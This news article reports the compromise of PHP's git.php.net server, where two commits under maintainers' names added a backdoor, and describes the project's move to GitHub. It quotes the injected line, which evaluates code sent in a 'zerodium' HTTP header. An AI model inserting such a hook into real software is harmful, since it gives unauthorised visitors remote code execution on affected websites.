Hackers Backdoor PHP After Breaching Internal Git Server

A cartoon door leads to a wall of computer code.

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave the code the code-injection capability to visitors who had the word “zerodium” in an HTTP header.

PHP.net hacked, code backdoored

The commits were made to the php-src repo under the account names of two well-known PHP developers, Rasmus Lerdorf and Nikita Popov. “We don’t yet know how exactly this happened, but everything points toward a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov wrote in a notice published on Sunday night.

In the aftermath of the compromise, Popov said that PHP maintainers have concluded that their standalone Git infrastructure is an unnecessary security risk. As a result, they will discontinue the git.php.net server and make GitHub the official source for PHP repositories. Going forward, all PHP source code changes will be made directly to GitHub rather than to git.php.net.

The malicious changes came to public attention no later than Sunday night by developers including Markus Staab, Jake Birchallf, and Michael Voříšek as they scrutinized a commit made on Saturday. The update, which purported to fix a typo, was made under an account that used Lerdorf’s name. Shortly after the first discovery, Voříšek spotted the second malicious commit, which was made under Popov’s account name. It purported to revert the previous typo fix.

Both commits added the same lines of code:

onvert_to_string(enc); if (strstr(Z_STRVAL_P(enc), "zerodium")) { zend_try { zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Zerodium is a broker that buys exploits from researchers and sells them to government agencies for use in investigations or other purposes. Why the commits referenced Zerodium is not clear. The company’s CEO, Chaouki Bekrar, said on Twitter Monday that Zerodium wasn’t involved.

“Cheers to the troll who put ‘Zerodium’ in today’s PHP git compromised commits,” he wrote. “Obviously, we have nothing to do with this. Likely, the researcher(s) who found this bug/exploit tried to sell it to many entities but none wanted to buy this crap, so they burned it for fun.

Bad karma

Prior to the compromise, The PHP Group handled all write access to the repository on their own git server http://git.php.net/ using what Popov called a “home-grown” system called Karma. It provided developers different levels of access privileges depending on previous contributions. GitHub, meanwhile, had been a mirror repository.

Now, the PHP Group is abandoning the self-hosted and managed git infrastructure and replacing it with GitHub. The change means that GitHub is now the “canonical” repository. The PHP Group will no longer use the Karma system. Instead, contributors will have to be part of the PHP organization on GitHub and must use two-factor authentication for accounts with the ability to make commits.

This weekend’s event isn’t the first time php.net servers have been breached with the intent of performing a supply chain attack. In early 2019, the widely used PHP Extension and Application Repository temporarily shut down most of the site after discovering that hackers replaced the main package manager with a malicious one. Group developers said that anyone who had downloaded the package manager in the past six months should get a new copy.

PHP runs an estimated 80 percent of websites. There are no reports of websites incorporating the malicious changes into their production environments.

The changes were likely made by people who wanted brag about their unauthorized access to the PHP Git server rather than those trying to actually backdoor websites that use PHP, said HD Moore, co-founder and CEO of network discovery platform Rumble.

“Sounds like the attackers are trolling Zerodium or trying to give the impression that the code was backdoored for much longer,” he told Ars. “Either way, I would be spending a lot of time going through previous commits if I had any security interest in PHP.”